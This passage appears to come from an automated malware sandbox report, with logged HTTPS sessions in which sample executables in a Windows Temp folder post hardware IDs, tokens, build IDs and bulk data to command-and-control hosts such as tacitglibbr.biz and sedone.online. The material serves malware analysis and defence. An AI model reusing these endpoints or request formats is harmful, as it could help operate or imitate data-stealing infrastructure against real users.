AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:16 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49998	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:16 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7388JK8I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1252 Host: tacitglibbr.biz
2024-12-16 10:04:16 UTC	1252	OUT	Data Raw: 2d 2d 37 33 38 38 4a 4b 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 33 38 38 4a 4b 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 33 38 38 4a 4b 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 33 38 38 4a 4b 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --7388JK8IContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--7388JK8IContent-Disposition: form-data; name="pid"1--7388JK8IContent-Disposition: form-data; name="lid"PsFKDg--pablo--7388JK8IContent-Disposit
2024-12-16 10:04:17 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4rspee8m9uvdjdtlo2ap1dg7pa; expires=Fri, 11-Apr-2025 03:50:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0y6XbC3nRObCFwrKfRNFNN9UWxrXJumi1ldVJfmQYnSJA6Rijei570fjsX%2FSlz3M5n40%2F%2B52TgpzULZ3tytZyeG7WOHkXeYCsdrZ%2FhBAdZ3be%2BWQAh9crhAH2%2BihglslTI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd92bbdd341c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1728&rtt_var=673&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2158&delivery_rate=1689814&cwnd=205&unsent_bytes=0&cid=9429ebe27e123999&ts=655&x=0"
2024-12-16 10:04:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50004	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:17 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XBSR1VAI58YUAI5XB1NG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:17 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 42 53 52 31 56 41 49 35 38 59 55 41 49 35 58 42 31 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 58 42 53 52 31 56 41 49 35 38 59 55 41 49 35 58 42 31 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 42 53 52 31 56 41 49 35 38 59 55 41 49 35 58 42 31 4e 47 0d 0a 43 6f 6e 74 Data Ascii: ------XBSR1VAI58YUAI5XB1NGContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------XBSR1VAI58YUAI5XB1NGContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XBSR1VAI58YUAI5XB1NGCont
2024-12-16 10:04:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50007	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:18 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: tacitglibbr.biz
2024-12-16 10:04:18 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-16 10:04:23 UTC	1020	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8job87lbr9oc4ibro5tfv2bvi8; expires=Fri, 11-Apr-2025 03:51:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bwH50GCrIs0B%2F248tF0CdTgq2lP8h0N7DJT7BTXMnqOxtrqqMPQrO8Xd%2B8%2B0j1O%2FPDflrYK2zuaP5d%2Ffbw%2FfrnZN557Q%2F81q7lFgfR394OfizboQwTKnLjB0nQzNgRfxsAU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd936e94643b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=1556&rtt_var=1562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=946&delivery_rate=533820&cwnd=231&unsent_bytes=0&cid=295d841ba45715aa&ts=5314&x=0"
2024-12-16 10:04:23 UTC	349	IN	Data Raw: 31 64 32 63 0d 0a 61 59 66 6d 71 77 71 46 4c 30 33 54 58 62 73 4c 4e 4a 7a 4e 74 76 6b 72 37 6d 71 2f 44 63 5a 55 30 43 30 55 2b 6a 6a 71 49 70 6f 53 70 5a 43 4a 4d 4c 45 44 62 36 41 34 6d 54 46 41 37 72 6a 54 31 51 6d 50 44 70 30 33 6f 44 57 38 58 6e 48 57 47 70 78 50 75 46 50 68 68 38 64 35 34 41 4e 76 74 69 57 5a 4d 57 2f 6e 37 39 4f 58 43 64 52 49 32 6d 65 6b 4e 62 78 50 64 5a 46 58 6d 6b 37 35 41 65 75 42 77 32 2f 6d 53 79 79 2f 4d 4e 35 75 55 66 32 6e 32 4a 42 47 68 67 65 64 49 65 51 78 71 67 38 75 32 48 57 50 56 76 73 6b 35 70 58 41 4b 50 67 44 4e 76 45 34 31 53 6b 4f 76 71 7a 54 6d 30 65 49 44 74 52 6c 72 6a 79 30 54 6e 43 51 53 49 4e 45 38 67 48 6c 67 73 4a 6c 37 31 38 68 74 54 66 56 61 46 76 39 37 35 72 62 54 70 52 49 68 53 2f 33 42 4c 46 65 5a Data Ascii: 1d2caYfmqwqFL03TXbsLNJzNtvkr7mq/DcZU0C0U+jjqIpoSpZCJMLEDb6A4mTFA7rjT1QmPDp03oDW8XnHWGpxPuFPhh8d54ANvtiWZMW/n79OXCdRI2mekNbxPdZFXmk75AeuBw2/mSyy/MN5uUf2n2JBGhgedIeQxqg8u2HWPVvsk5pXAKPgDNvE41SkOvqzTm0eIDtRlrjy0TnCQSINE8gHlgsJl718htTfVaFv975rbTpRIhS/3BLFeZ
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 6c 67 73 64 70 36 6b 30 39 75 54 54 53 62 45 54 31 70 74 6d 57 53 59 45 43 30 6d 79 6b 4d 62 68 46 65 5a 4a 65 68 55 33 2b 43 2b 58 45 68 79 6a 67 56 57 2f 70 66 2f 70 73 52 76 6d 6a 77 74 6c 7a 7a 42 65 54 64 75 51 78 76 67 38 75 32 46 4b 4e 51 2f 73 41 36 6f 66 42 59 2f 56 4e 50 62 63 79 33 48 74 51 2b 36 48 65 6d 46 75 47 42 74 74 73 72 54 32 37 53 6e 47 63 47 73 59 41 2f 78 4f 6c 33 49 6c 4a 36 6b 59 6a 75 79 6a 5a 4b 55 6d 77 74 70 53 63 52 63 78 51 6e 57 75 6c 4d 72 4e 4c 65 4a 5a 65 68 45 62 32 42 75 71 43 77 32 6a 67 52 79 65 35 50 74 52 69 57 66 36 71 32 5a 39 50 67 41 6e 59 4c 2b 70 32 74 56 63 32 77 42 71 6d 52 2f 73 5a 70 37 48 4b 5a 75 6c 4b 4f 66 45 67 6c 33 41 57 2b 61 4f 55 77 77 6d 43 44 64 4a 39 70 53 53 33 51 57 53 55 58 34 35 4e 2b 77 Data Ascii: lgsdp6k09uTTSbET1ptmWSYEC0mykMbhFeZJehU3+C+XEhyjgVW/pf/psRvmjwtlzzBeTduQxvg8u2FKNQ/sA6ofBY/VNPbcy3HtQ+6HemFuGBttsrT27SnGcGsYA/xOl3IlJ6kYjuyjZKUmwtpScRcxQnWulMrNLeJZehEb2BuqCw2jgRye5PtRiWf6q2Z9PgAnYL+p2tVc2wBqmR/sZp7HKZulKOfEgl3AW+aOUwwmCDdJ9pSS3QWSUX45N+w
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 5a 75 6c 4b 4f 66 45 67 6c 33 41 57 2b 61 4f 55 77 77 6d 42 41 4e 68 71 71 7a 65 34 51 58 4f 53 56 6f 42 4f 2b 78 6e 71 67 4d 6c 6b 37 30 63 69 76 7a 76 52 59 46 33 31 71 64 53 61 51 38 78 47 6e 57 69 38 64 75 6f 50 51 70 39 57 68 55 2b 36 50 75 61 4b 78 32 2f 78 44 54 44 2f 4a 70 6c 75 57 72 37 33 6c 4a 64 41 6a 41 50 58 61 36 51 78 76 30 70 31 6e 31 6d 46 52 2f 49 46 34 6f 44 46 59 65 70 4c 4c 37 59 37 33 48 74 54 39 36 50 59 32 77 66 4d 44 38 55 76 2f 48 61 64 53 47 43 62 64 59 74 52 38 55 76 36 79 74 41 6f 34 45 46 76 36 58 2f 65 62 46 37 31 71 64 79 62 57 34 6b 47 31 6d 36 75 4d 4c 4e 43 65 70 35 61 69 55 44 2b 42 2b 57 44 7a 6e 72 31 53 43 6d 6a 4e 5a 6b 6e 46 76 6d 33 6c 4d 4d 4a 75 68 6a 4b 66 72 4a 30 68 30 78 34 6c 6c 32 65 41 4f 64 46 2f 4d 54 Data Ascii: ZulKOfEgl3AW+aOUwwmBANhqqze4QXOSVoBO+xnqgMlk70civzvRYF31qdSaQ8xGnWi8duoPQp9WhU+6PuaKx2/xDTD/JpluWr73lJdAjAPXa6Qxv0p1n1mFR/IF4oDFYepLL7Y73HtT96PY2wfMD8Uv/HadSGCbdYtR8Uv6ytAo4EFv6X/ebF71qdybW4kG1m6uMLNCep5aiUD+B+WDznr1SCmjNZknFvm3lMMJuhjKfrJ0h0x4ll2eAOdF/MT
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 7a 32 35 4d 64 52 69 57 66 57 39 31 4a 5a 4e 67 41 7a 56 5a 4b 35 32 2f 41 39 78 67 42 72 51 41 4d 30 47 36 6f 54 4b 66 71 64 53 59 61 68 2f 33 6d 55 57 70 75 2f 59 6c 55 6d 44 42 4e 46 6b 72 44 65 2b 51 58 47 64 55 34 42 49 36 67 72 68 6a 4d 68 6d 36 45 77 72 74 44 72 64 62 6c 4c 34 6f 4a 54 56 43 59 73 51 6e 54 66 6b 47 5a 56 36 4e 4c 6c 67 79 46 2b 32 45 71 57 44 78 53 69 2f 44 53 4f 79 4d 39 46 6d 55 50 65 6a 33 70 4a 43 67 41 50 5a 59 36 30 7a 74 45 35 7a 6e 56 75 4d 54 50 49 4e 35 6f 66 47 5a 2b 68 46 62 2f 39 2f 33 6e 45 57 70 75 2f 78 6a 45 4b 43 44 70 31 77 36 69 2f 79 53 48 72 59 41 73 68 4d 38 51 33 6a 67 63 56 70 34 55 55 71 75 54 76 59 62 31 44 39 6f 4e 43 65 53 49 4d 4d 30 57 47 75 4e 37 4e 44 66 5a 64 52 6a 51 43 32 53 2b 4b 63 69 54 43 6e Data Ascii: z25MdRiWfW91JZNgAzVZK52/A9xgBrQAM0G6oTKfqdSYah/3mUWpu/YlUmDBNFkrDe+QXGdU4BI6grhjMhm6EwrtDrdblL4oJTVCYsQnTfkGZV6NLlgyF+2EqWDxSi/DSOyM9FmUPej3pJCgAPZY60ztE5znVuMTPIN5ofGZ+hFb/9/3nEWpu/xjEKCDp1w6i/ySHrYAshM8Q3jgcVp4UUquTvYb1D9oNCeSIMM0WGuN7NDfZdRjQC2S+KciTCn
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 6a 63 59 6c 6e 79 37 35 72 62 54 70 52 49 68 53 2b 4b 50 61 46 59 64 5a 5a 52 6e 6c 75 34 46 4b 75 64 69 57 2f 72 44 58 66 78 50 4e 4a 69 55 76 36 6a 31 4a 39 45 6a 42 72 53 61 4b 4d 2f 75 56 31 38 6e 31 32 44 53 50 4d 45 34 35 62 46 5a 76 56 49 50 61 4e 2f 6c 79 6c 52 35 75 2b 4d 32 33 2b 4c 47 4d 31 73 35 67 65 6b 54 47 43 54 56 34 51 41 35 30 58 38 78 4d 35 6b 70 78 56 76 74 7a 44 51 61 6c 6e 2f 70 74 69 57 54 49 55 4e 33 47 6d 67 50 4c 68 50 63 4a 35 62 6a 55 72 37 43 75 2b 4e 7a 6d 44 67 54 6a 33 78 63 5a 6c 75 54 72 37 33 6c 4c 4a 4f 6e 67 62 4e 4c 37 74 34 71 77 39 78 6c 42 72 51 41 50 77 42 36 6f 44 4f 5a 4f 46 49 4b 62 77 2b 31 6d 68 57 38 61 76 66 6b 6b 2b 4e 42 64 68 69 6f 43 53 34 52 48 6d 55 55 34 52 4e 75 45 57 6c 67 39 45 6f 76 77 30 65 76 Data Ascii: jcYlny75rbTpRIhS+KPaFYdZZRnlu4FKudiW/rDXfxPNJiUv6j1J9EjBrSaKM/uV18n12DSPME45bFZvVIPaN/lylR5u+M23+LGM1s5gekTGCTV4QA50X8xM5kpxVvtzDQaln/ptiWTIUN3GmgPLhPcJ5bjUr7Cu+NzmDgTj3xcZluTr73lLJOngbNL7t4qw9xlBrQAPwB6oDOZOFIKbw+1mhW8avfkk+NBdhioCS4RHmUU4RNuEWlg9Eovw0ev
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 63 37 4b 58 66 6e 6b 53 42 42 64 35 70 6f 6a 32 2b 58 58 2b 59 57 59 4d 41 74 6b 76 69 6e 49 6b 77 70 32 34 34 70 7a 58 65 5a 55 44 31 72 74 65 4e 52 4a 78 49 6b 79 2b 31 4d 61 4d 50 4c 6f 35 4b 6e 30 66 6e 52 66 7a 45 7a 6d 53 6e 46 57 2b 33 4e 74 39 75 55 50 43 39 30 5a 31 47 67 77 48 55 61 36 77 31 73 6b 74 79 6e 31 2b 4c 54 50 4d 4d 35 6f 76 4e 59 65 6c 45 49 50 46 78 6d 57 35 4f 76 76 65 55 75 6c 4b 50 42 4e 41 76 75 33 69 72 44 33 47 55 47 74 41 41 39 41 58 67 68 4d 4e 75 34 30 67 70 75 7a 72 5a 59 6c 58 78 71 39 4b 66 52 6f 77 44 31 47 36 69 4d 37 68 45 63 4a 56 5a 6a 6b 61 34 52 61 57 44 30 53 69 2f 44 51 2b 71 4d 74 56 75 46 75 48 68 7a 64 74 4f 67 45 69 46 4c 36 38 36 74 6b 68 32 6c 56 6d 41 52 66 77 42 34 49 54 42 65 75 39 4e 4b 4b 4d 74 32 57 Data Ascii: c7KXfnkSBBd5poj2+XX+YWYMAtkvinIkwp244pzXeZUD1rteNRJxIky+1MaMPLo5Kn0fnRfzEzmSnFW+3Nt9uUPC90Z1GgwHUa6w1sktyn1+LTPMM5ovNYelEIPFxmW5OvveUulKPBNAvu3irD3GUGtAA9AXghMNu40gpuzrZYlXxq9KfRowD1G6iM7hEcJVZjka4RaWD0Si/DQ+qMtVuFuHhzdtOgEiFL686tkh2lVmARfwB4ITBeu9NKKMt2W
2024-12-16 10:04:23 UTC	282	IN	Data Raw: 6c 4b 55 4a 6e 67 76 4e 62 4b 73 6e 6a 41 38 75 67 57 54 49 53 2b 34 4d 39 59 66 66 59 2b 70 42 50 6f 39 2f 67 54 30 45 72 50 32 47 79 56 62 4d 46 2b 49 68 35 44 66 79 46 30 2b 42 47 70 34 41 6f 46 6d 72 78 4e 73 6f 76 77 31 6f 73 69 33 4c 62 31 58 6f 72 4a 4f 6c 64 36 73 65 31 32 69 30 4d 61 56 41 4e 74 59 61 68 77 43 67 4d 71 57 4e 7a 6e 50 32 57 79 4b 68 4f 4a 6c 57 47 4c 36 33 6c 4d 4d 4a 75 51 76 54 59 61 4d 67 6f 77 4a 52 6a 6c 43 50 55 50 38 63 36 73 53 48 4b 4f 45 4e 64 2b 4a 78 6d 57 31 48 76 76 65 45 79 52 4c 5a 57 34 6f 2f 39 69 6e 38 56 6a 61 4f 47 74 41 53 74 6b 76 33 78 4a 45 6f 6f 45 34 39 6f 7a 6e 61 66 31 57 35 6b 65 71 38 55 34 45 4f 79 6e 36 61 43 4c 56 56 65 35 35 4e 6d 51 7a 74 43 4f 75 4b 7a 6e 36 6e 41 32 2b 2b 66 34 46 51 46 72 62 Data Ascii: lKUJngvNbKsnjA8ugWTIS+4M9YffY+pBPo9/gT0ErP2GyVbMF+Ih5DfyF0+BGp4AoFmrxNsovw1osi3Lb1XorJOld6se12i0MaVANtYahwCgMqWNznP2WyKhOJlWGL63lMMJuQvTYaMgowJRjlCPUP8c6sSHKOENd+JxmW1HvveEyRLZW4o/9in8VjaOGtAStkv3xJEooE49oznaf1W5keq8U4EOyn6aCLVVe55NmQztCOuKzn6nA2++f4FQFrb
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 32 62 66 30 0d 0a 34 35 50 59 4b 4b 6b 4e 4b 66 46 6e 69 53 63 57 2b 72 36 55 77 78 6e 65 55 34 67 38 38 32 62 67 55 44 69 42 47 70 34 41 6f 46 6d 72 78 4e 73 6f 76 77 31 6f 73 69 33 4c 62 31 58 6f 72 4a 4f 6c 64 36 49 50 32 32 71 6a 4a 76 42 68 66 59 78 64 79 41 36 34 42 4b 58 63 38 43 69 76 44 52 44 2f 66 38 45 70 44 72 36 61 31 35 56 48 69 78 37 4d 49 6f 6f 78 74 45 70 78 69 42 69 6d 53 2b 77 4d 70 63 71 4a 62 71 63 56 66 2f 39 2f 33 58 67 57 70 76 2b 47 77 42 7a 66 58 34 30 39 75 33 69 72 44 32 44 59 41 74 6f 4f 75 42 6d 6c 33 49 6b 76 35 46 38 39 74 7a 7a 50 61 68 48 41 6b 64 65 4e 52 49 4d 44 33 46 47 61 47 4c 39 4f 64 5a 59 59 75 56 62 31 47 2b 61 42 7a 6c 62 5a 51 79 69 6c 4f 4e 64 76 56 72 37 68 6c 4a 51 4a 31 44 47 64 4a 2b 51 4a 2f 41 39 75 32 Data Ascii: 2bf045PYKKkNKfFniScW+r6UwxneU4g882bgUDiBGp4AoFmrxNsovw1osi3Lb1XorJOld6IP22qjJvBhfYxdyA64BKXc8CivDRD/f8EpDr6a15VHix7MIooxtEpxiBimS+wMpcqJbqcVf/9/3XgWpv+GwBzfX409u3irD2DYAtoOuBml3Ikv5F89tzzPahHAkdeNRIMD3FGaGL9OdZYYuVb1G+aBzlbZQyilONdvVr7hlJQJ1DGdJ+QJ/A9u2
2024-12-16 10:04:23 UTC	1369	IN	Data Raw: 76 57 37 65 62 68 33 47 6e 57 32 2f 70 62 5a 63 70 52 4c 37 33 6c 4e 78 4b 6e 68 72 62 62 4c 49 31 39 58 46 49 76 31 53 50 51 65 34 62 36 49 6a 6f 61 2f 5a 48 45 59 38 71 32 6d 64 59 2b 62 6e 46 32 77 66 4d 42 35 30 33 6e 58 62 36 44 30 6e 57 47 70 41 41 6f 45 76 51 68 38 64 6d 34 46 73 2b 2f 42 6a 58 62 6c 66 6f 76 39 6d 58 61 49 38 5a 31 79 2f 71 64 72 51 50 4c 73 6f 55 79 45 54 70 53 37 33 55 6d 7a 4f 79 48 6e 6a 68 62 63 59 6e 54 37 36 35 6c 4d 4d 62 77 6b 6a 50 4c 2f 78 32 39 55 78 6b 69 6c 79 4c 56 76 74 4d 32 37 72 73 66 2b 52 64 4b 62 49 42 35 30 4a 61 2b 4b 6a 4f 6e 45 2b 71 4b 4a 30 68 35 44 6e 79 46 30 2f 59 45 73 68 2f 74 6b 76 39 78 4a 45 6f 30 6b 34 68 76 7a 6a 50 65 42 76 62 75 4e 65 4c 54 34 39 49 6b 79 2b 69 64 75 6f 66 4f 4e 68 65 6d 51 Data Ascii: vW7ebh3GnW2/pbZcpRL73lNxKnhrbbLI19XFIv1SPQe4b6Ijoa/ZHEY8q2mdY+bnF2wfMB503nXb6D0nWGpAAoEvQh8dm4Fs+/BjXblfov9mXaI8Z1y/qdrQPLsoUyETpS73UmzOyHnjhbcYnT765lMMbwkjPL/x29UxkilyLVvtM27rsf+RdKbIB50Ja+KjOnE+qKJ0h5DnyF0/YEsh/tkv9xJEo0k4hvzjPeBvbuNeLT49Iky+iduofONhemQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50012	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:18 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JY3GBVN15DRR3BPQ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: tacitglibbr.biz
2024-12-16 10:04:18 UTC	15071	OUT	Data Raw: 2d 2d 4a 59 33 47 42 56 4e 31 35 44 52 52 33 42 50 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 59 33 47 42 56 4e 31 35 44 52 52 33 42 50 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 59 33 47 42 56 4e 31 35 44 52 52 33 42 50 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: 